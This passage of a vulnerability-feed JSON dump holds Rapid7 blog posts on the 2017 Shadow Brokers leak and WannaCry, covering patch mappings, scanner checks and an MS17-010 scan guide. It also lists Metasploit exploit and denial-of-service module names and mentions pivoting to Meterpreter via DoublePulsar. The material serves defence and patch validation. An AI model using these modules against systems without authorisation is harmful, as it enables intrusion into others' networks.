"CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-06-23T21:23:11", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/23/protecting-against-doublepulsar-infection-with-insightvm-and-nexpose", "id": "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-01T16:52:25", "description": "<!-- [DocumentBodyStart:988188db-6fd0-45a3-a3c1-27dc87650c8c] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The Rapid7 team has been busy evaluating the threats posed by <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Farstechnica.com%2Fsecurity%2F2017%2F04%2Fpurported-shadow-brokers-0days-were-in-fact-killed-by-mysterious-patch%2F\" rel=\"nofollow\" target=\"_blank\">last Friday’s Shadow Broker exploit and tool release</a> and answering questions from colleagues, customers, and family members about the release. We know that many people have questions about exactly what was released, the threat it poses, and how to respond, so we have decided to compile a list of frequently asked questions.</span></p><p><span style=\"font-size: 14pt;\"><br/><span style=\"font-family: Arial; color: #eb7a3d; font-weight: bold;\">What’s the story?</span></span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">On Friday, April 15, a hacking group known as the “Shadow Brokers” released a trove of alleged NSA data, detailing exploits and vulnerabilities in a range of technologies. The data includes information on multiple Windows exploits, a framework called Fuzzbunch for loading the exploit binaries onto systems, and a variety of post-exploitation tools. </span></p><p><span style=\"font-size: 10pt;\"><br/><span style=\"font-family: Arial; color: #000000;\">This was understandably a cause for concern, but fortunately, none of the exploits were zero days. Many targeted older systems and the vulnerabilities they exploited were well-known, and four of the exploits targeted vulnerabilities that were patched last month. </span></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">Who are these shady characters?</span></p><p><span style=\"font-size: 10pt;\"><span style=\"font-family: Arial; color: #000000;\">The Shadow Brokers are a group that emerged in August of 2016, claiming to have information on tools used by a threat group known as <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fsecurelist.com%2Fblog%2Fresearch%2F68750%2Fequation-the-death-star-of-malware-galaxy%2F\" rel=\"nofollow\" target=\"_blank\">Equation Group</a></span><span style=\"font-family: Arial; color: #000000;\">. The initial information that was leaked by the Shadow Brokers involved firewall implants and exploitation scripts targeting vendors such as Cisco, Juniper, and Topsec, which were confirmed to be real and subsequently patched by the various vendors. Shadow Brokers also claimed to have access to a larger trove of information that they would sell for 1 million bitcoins, and later lowered the amount to 10,000 bitcoins, which could be crowdfunded so that the tools would be released to the public, rather than just to the highest bidder. The Shadow Brokers have popped up from time to time over the past 9 months leaking additional information, including IP addresses used by the Equation Group and additional tools. Last week, having failed to make their price, they released the password for the encrypted archive, and the security community went into a frenzy of salivation and speculation as it raced to unpack the secrets held in the vault.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">The April 15th release seems to be the culmination of the Shadow Brokers’ activity; however, it is possible that there is still additional information about the Equation Group that they have not yet released to the public.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">Should you be worried?</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt;\"><span style=\"font-family: Arial; color: #000000;\">A trove of nation state-level exploits being released for anyone to use is certainly not a good thing, particularly when they relate to the most widely-used software in the world, but the situation is not as dire as it originally seemed. There are patches available for all of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fblogs.technet.microsoft.com%2Fmsrc%2F2017%2F04%2F14%2Fprotecting-customers-and-evaluating-risk%2F\" rel=\"nofollow\" target=\"_blank\">vulnerabilities</a>, so a </span><span style=\"color: #000000; font-family: Arial; font-style: italic;\"><strong>very</strong></span><span style=\"font-family: Arial; color: #000000;\"> good starting point is to verify that your systems are up to date on patches. Home users and small network operators likely had the patches installed automatically in the last update, but it is always good to double-check.  </span></span></p><p><br/><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">If you are unsure if you are up to date on these patches, we have checks for them all in <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose%2F\" target=\"_blank\">Rapid7 Nexpose</a> and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">Rapid7 InsightVM</a>. <span style=\"font-family: Arial; color: #000000;\">These checks are all included in the </span><span style=\"font-family: Arial; color: #000000; font-style: italic;\">Microsoft hotfix</span><span style=\"font-family: Arial; color: #000000;\"> scan template.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><div class=\"j-rte-table\"><table style=\"border: none;\"><tbody><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalBlue</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalSynergy</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalRomance</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalChampion</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0143</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0144</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0145</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0146</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0147</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0148</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EmeraldThread</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS10-061</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS10-061</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EskimoRoll</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS14-068</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS14-068</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EducatedScholar</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS09-050</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS09-050</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EclipsedWing</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS08-067</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS08-067</span></p></td></tr></tbody></table></div><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">If you want to ensure your patching efforts have been truly effective, or understand the impact of exploitation, you can test your exposure with several modules in <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2F\" target=\"_blank\">Rapid7 Metasploit</a>:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><div class=\"j-rte-table\"><table style=\"border: none;\"><tbody><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalBlue</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/smb_ms17_010</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EmeraldThread</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS10-061</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">exploit/windows/smb/psexec</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalChampion</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;background-color: #ffffff;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/smb_ms17_010</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EskimoRoll</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS14-068 / CVE-2014-6324</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/admin/kerberos/ms14_068_kerberos_checksum</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalRomance</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;background-color: #ffffff;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/smb_ms17_010</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EducatedScholar</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS09-050</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh, auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff, exploits/windows/smb/ms09_050_smb2_negotiate_func_index</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalSynergy</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;background-color: #ffffff;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/smb_ms17_010</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EclipsedWing</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS08-067</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;background-color: #ffffff;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/ms08_067_check</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">exploits/windows/smb/ms08_067_netapi</span></p></td></tr></tbody></table></div><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"color: #333333; font-family: Arial, sans-serif, sans; font-size: 10pt;\">In addition, all of the above exploits can also be pivoted to a Meterpreter session via the DoublePulsar implant.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">What else can you do to protect yourselves?</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt;\"><span style=\"font-family: Arial; color: #000000;\">If patching is still in progress or will take a little bit longer to fully implement (we get it) then there are detections for the exploits that you can implement while patching in underway. For examples of ways to implement detections, check out <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7721\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2016/11/16/introspective-intelligence-understanding-detections\">this blog post </a>from Mike Scutt</span><span style=\"font-family: Arial; color: #000000;\">. </span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-family: arial, helvetica, sans-serif; color: #000000; font-size: 10pt;\"><span style=\"color: #1155cc;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightidr%2F\" target=\"_blank\">Rapid7 InsightIDR</a></span><span style=\"color: #000000;\">, our solution for incident detection and response, has an active Threat Community with intelligence to help detect the use of these exploits and any resulting attacker behavior. You can subscribe to this threat in the community portal. For more on how threat intel works in InsightIDR, check out this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Flist%3DPLMrgKzfE1aIN_nurFyggA7Oijqk0uH8VX%26v%3DsmuG6rHGQY8\" rel=\"nofollow\" target=\"_blank\">4-min Solution Short</a>.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">It is also important to stay aware of other activity on your network during the patching and hardening processes. It is easy to get distracted by the latest threats, and attackers often take advantage of defender preoccupation to achieve their own goals, which may or may not have anything to do with this latest tool leak. </span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">What about that IIS 6 box we have on the public internet? </span></p><p><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">It is very easy for commentators to point fingers and say that anyone who has legacy or unsupported systems should just get rid of them, but we know that the reality is much more complicated. There will be legacy systems (IIS 6 and otherwise) in organizations that for whatever reason cannot just be replaced or updated. That being said, there are some serious issues with leaving systems that are vulnerable to these exploits publicly accessible. Three of the exploits (“EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”) will remain effective on EOL systems and the impacts are concerning enough that it is really not a good idea to have internet-facing vulnerable systems. If you are in this position we recommend coming up with a plan to update the system and to keep a very close eye on the development of this threat. Due to the sophistication of this tool set, if widespread exploitation starts then it will likely only be a matter of time before the system is compromised.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">Should you be worried about the Equation Group?</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">T<span style=\"font-size: 10pt;\">he threat from Equation Group itself to most organizations is minimal, unless your organization has a very specific threat profile. Kaspersky’s initial analysis of the group lists the countries and sectors that they have seen targeted in the past. This information can help you determine if your organization may have been targeted.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 10pt;\"><span style=\"font-family: Arial; color: #000000;\">While that is good news for most organizations, that doesn’t mean that there is no cause for concern. These tools appear to be very sophisticated, focusing on evading security tools such as antivirus and generating little to no logging on the systems that they target. </span><span style=\"color: #000000; font-family: Arial; font-style: italic;\"><strong>For most organizations the larger threat is that of attackers co-opting these very sophisticated and now public exploits and other post-exploitation tools and using them to achieve their own goals</strong></span><span style=\"font-family: Arial; color: #000000;\"><strong>.</strong> This increases the threat and makes defending against, and detecting, these tools more critical. We have seen a sharp decrease in the amount of time it take criminals to incorporate exploits into their existing operations. It will not be long before we will start to see more widespread attacks using these tools. </span></span></p><p><span><span><br/></span></span><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">Where should I build my underground bunker?</span></p><p><span style=\"color: #000000; font-size: 10pt; font-family: Arial;\">While this particular threat is by no means a reason to go underground, there are plenty of other reasons that you may need to hide from the world and we believe in being prepared. That being said, building your own underground bunker is a difficult and time consuming task, so we recommend that you find an existing bunker, pitch in some money with some friends, and wait for the next inevitable bunker-level catastrophe to hit, because this isn’t it.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"color: #000000; font-size: 10pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7842-66217/Build+a+bunker.jpg\"><img alt=\"Build a bunker.jpg\" class=\"image-1 jive-image\" height=\"420\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7842-66217/746-420/Build+a+bunker.jpg\" style=\" width: 746.132px;\" width=\"746\"/></a></span></p></div><!-- [DocumentBodyEnd:988188db-6fd0-45a3-a3c1-27dc87650c8c] -->", "cvss3": {}, "published": "2017-04-18T20:50:20", "title": "The Shadow Brokers Leaked Exploits Explained", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-6324", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-04-18T20:50:20", "href": "https://community.rapid7.com/community/infosec/blog/2017/04/18/the-shadow-brokers-leaked-exploits-faq", "id": "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-19T18:16:21", "description": "<!-- [DocumentBodyStart:671843e7-7237-482e-9c1c-b149f122c46e] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. Also removed steps 5 and 6 from scan instructions as they were not strictly necessary and causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. </strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 6/7/17: Fixed a small error in the dynamic asset group/dashboard section. We also now have a pre-built WannaCry dashboards in InsightVM***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren’t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates > Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don’t forget to give your copy a name and description; here, we’ll call it “WNCRY Scan Template”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then “By Individual Check”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check “<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>” and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" 